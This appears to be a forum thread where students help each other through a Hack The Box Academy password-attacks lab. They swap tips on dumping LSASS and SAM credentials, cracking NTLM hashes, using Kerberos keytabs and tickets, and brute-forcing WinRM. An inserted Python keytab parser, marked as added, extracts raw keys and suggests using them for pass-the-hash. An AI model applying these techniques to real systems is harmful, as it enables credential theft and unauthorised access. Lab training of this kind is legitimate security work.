Password Attacks | Academy

No! I skipped the module. I will do it later.

The .zip file doesn’t work.

It won’t let me download anything from GitHub.

Never mind, I used scp to upload firefox_decrypt.

For anyone else who can’t get pypykatz to work for the Attacking LSASS section, just copy the SAM registry hives as explained in the previous section to get the NTLM hash. Then you can use hashcat (or CrackStation if you’re feeling lazy) to get the password.

I wasted so much time trying to troubleshoot why pypykatz wouldn’t install. If anyone knows how to get it to work, please DM me!

2 Likes

How did you fix it?
I am having the same issue. Thanks.

1 Like

Check out lsassy for attacking LSASS: GitHub - Hackndo/lsassy: Extract credentials from lsass remotely
Not sure why it’s not included in this module. It seems to be more reliable. Also, for many of the attack methods in this module, check out: LSASS secrets - The Hacker Recipes

1 Like

Make sure that once you find the keytab file you use the command like this:
kinit LINUX01$ -k -t REDACTED.keytab

3 Likes
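Before running `kinit -k -t` as in the post above it helps to know exactly which principal, kvno and encryption types a keytab holds, which is what `klist -kte` prints. The following is an added example (not from the thread or the Academy module) that parses the MIT keytab format 0x0502 directly: every integer is big-endian, each entry is length-prefixed, and a negative length marks a deleted slot. The embedded keytab is constructed for the example with fake key bytes; the realm INLANEFREIGHT.HTB is taken from the lab hostname mentioned elsewhere in the thread and is an assumption.

```python
"""List principal, kvno, enctype and key for every entry of a 0x0502 keytab."""
import struct

ENCTYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def _counted(buf: bytes, pos: int):
    """uint16 length + bytes -> (bytes, new_pos)."""
    (n,) = struct.unpack_from(">H", buf, pos)
    return buf[pos + 2:pos + 2 + n], pos + 2 + n


def parse_keytab(data: bytes):
    if data[:2] != b"\x05\x02":
        raise ValueError("not a 0x0502 keytab")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size == 0:
            break
        if size < 0:                      # deleted slot: skip |size| bytes
            pos += -size
            continue
        entry, p = data[pos:pos + size], 0
        pos += size
        (ncomp,) = struct.unpack_from(">H", entry, p)
        p += 2
        realm, p = _counted(entry, p)
        comps = []
        for _ in range(ncomp):
            c, p = _counted(entry, p)
            comps.append(c.decode())
        _name_type, ts, vno8 = struct.unpack_from(">IIB", entry, p)
        p += 9
        enctype, klen = struct.unpack_from(">HH", entry, p)
        p += 4
        key = entry[p:p + klen]
        p += klen
        # A trailing uint32 kvno, when present, overrides the 8-bit one.
        kvno = struct.unpack_from(">I", entry, p)[0] if p + 4 <= len(entry) else vno8
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "kvno": kvno,
            "enctype": ENCTYPES.get(enctype, str(enctype)),
            "key": key.hex(),
            "timestamp": ts,
        })
    return entries


def build_entry(principal: str, kvno: int, enctype: int, key: bytes, ts: int = 0) -> bytes:
    """Serialize one keytab entry; used only to construct the sample below."""
    name, realm = principal.rsplit("@", 1)
    comps = name.split("/")
    body = struct.pack(">H", len(comps))
    for s in [realm] + comps:
        body += struct.pack(">H", len(s)) + s.encode()
    body += struct.pack(">IIB", 1, ts, kvno & 0xFF)       # name_type 1 = NT-PRINCIPAL
    body += struct.pack(">HH", enctype, len(key)) + key
    body += struct.pack(">I", kvno)
    return struct.pack(">i", len(body)) + body


# Constructed sample keytab: fake key material, realm assumed from the lab hostname.
SAMPLE_KEYTAB = (
    b"\x05\x02"
    + build_entry("LINUX01$@INLANEFREIGHT.HTB", 2, 18, bytes(range(32)), ts=1700000000)
    + build_entry("LINUX01$@INLANEFREIGHT.HTB", 2, 23, bytes(16))
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(data):
        print(f"{e['kvno']:>3} {e['principal']:<30} {e['enctype']:<25} {e['key']}")
```

Run it with the path of the keytab you found as the only argument; the principal column is the name to hand to `kinit -k -t`, and the rc4-hmac key, where present, is the account’s NT hash and can be used directly for pass-the-hash.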

Those on Password Attacks Lab - Easy: don’t bother mutating the password list.

Hello, same problem. Stuck at the last question, Q8, for 3 days now!!! I know (think) where to find the last ccache file (indeed in /root/.k*/***, and it is the same as one of julio’s ccache files already in the /tmp folder???), but when exporting it, with klist I noticed the expiration date has passed, so it will not work.
Please help. Can I send someone a DM for a clue? Very frustrating now!!

Hey guys,

It seems that I am a bit too late with my question, as the conversation passed this part a long time ago, but I am still stuck with the remote password attacks on network services.

I tried different wordlists for usernames and passwords for WinRM, but nothing worked for me.

The Pwnbox ran out of time and I had to start from scratch again and again.

Does someone have a hint on which wordlists to use?

Would be really helpful! <3

SOLVED: Silly me… @everyone who is stuck at the same point: there are provided resources with customized lists for usernames and passwords. Use them! 🙂

1 Like

Hi, do you mind sharing how you found the username for WinRM?

How can we find them?
I’m still stuck with WinRM.

I solved it.
Just use the Password-Attacks.zip from the resources and you’re good to go.

1 Like

Did you manage to resolve the issue with pypykatz?

I cannot access the SAM registry as the user htb-student, neither locally using reg.exe nor remotely using crackmapexec. How did you manage to get it?

Update: pypykatz was not working from my Kali, so I used the Pwnbox. You need to install it; I recommend the pip installation. After it’s installed, it should work. Don’t forget that the dump file is called lsass.DMP, not lsass.dmp.

Did anyone else have problems with RDP connection to the target box in “Pass the Ticket (PtT) from Windows” section?

This is the error I get when trying to connect using xfreerdp with provided credentials:

[23:38:55:588] [22785:22786] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:38:55:588] [22785:22786] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[23:38:55:790] [22785:22786] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[23:38:55:790] [22785:22786] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

2 Likes

Uninstalling pypykatz together with its config file using sudo apt --purge remove python3-pypykatz
and re-installing it using python3 -m pip install pypykatz helped me solve it.

1 Like

Can someone give some advice on this? Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

One of the users has admin privileges on \\DC01; once you locate and export the correct keytab, you can use WinRM to access and move freely around \\DC01.